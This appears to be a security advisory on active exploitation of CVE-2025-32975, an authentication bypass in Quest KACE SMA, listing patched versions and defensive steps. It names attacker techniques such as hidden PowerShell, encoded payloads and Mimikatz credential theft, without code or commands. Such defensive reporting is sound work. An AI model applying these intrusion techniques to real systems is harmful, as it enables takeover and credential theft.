Security Intelligence
Loading table of contents...
At a glance: A critical authentication bypass flaw in Quest KACE Systems Management Appliance (SMA) is being actively exploited in unpatched, internet-exposed systems. The vulnerability affects versions prior to patched releases from May 2025 and allows attackers to impersonate legitimate users without credentials, resulting in full administrative control.
Threat summary
Beginning the week of March 9, 2026, researchers reported malicious activity in customer environments linked to exploitation of unpatched Quest KACE Systems Management Appliance (SMA) instances exposed to the internet.
Quest KACE SMA is an on-premises endpoint management platform used for inventory, software deployment, patching, and monitoring, making it a high-value target.
The vulnerability, tracked as CVE-2025-32975, was originally patched in May 2025. It's a critical authentication bypass flaw in the single sign-on (SSO) mechanism that enables an adversary to impersonate legitimate users without valid credentials. The vulnerability allows complete administrative takeover of the appliance.
Researchers assigned the flaw with a maximum Common Vulnerability Scoring System (CVSS) score of 10 out of 10.
Threat actors were observed using CVE-2025-32975 to gain initial access, execute remote commands, create new administrative accounts, harvest credentials, enumerate domain structures, and move laterally into backup infrastructure and domain controllers. Activity included use of Base64-encoded payloads, remote file downloads, PowerShell execution in hidden contexts, registry modifications, and credential theft via Mimikatz. These actions indicate a post‑compromise objective of expanding control across the environment.
The issue has been resolved via hotfix or patch in the following KACE SMA versions:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
Organizations using versions prior are affected if systems remain unpatched and publicly exposed.
Analysis
Because KACE SMA is an on-premises management appliance with broad administrative privileges, its compromise can lead to full administrative control, followed by domain-wide lateral movement, credential theft, and access to backup systems.
Applying the vendor-provided fixed versions released in May 2025 remediates CVE-2025-32975. Restricting external access to Quest KACE SMA reduces the attack surface; placing the appliance behind a virtual private network or firewall limits the exposure.
Reviewing logs for unauthorized administrative account creation, unexpected command execution, and credential harvesting activity is recommended. Environments with historical internet exposure may require deeper investigation for persistence mechanisms and lateral movement.
Stay on top of emerging threats like this.
Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.
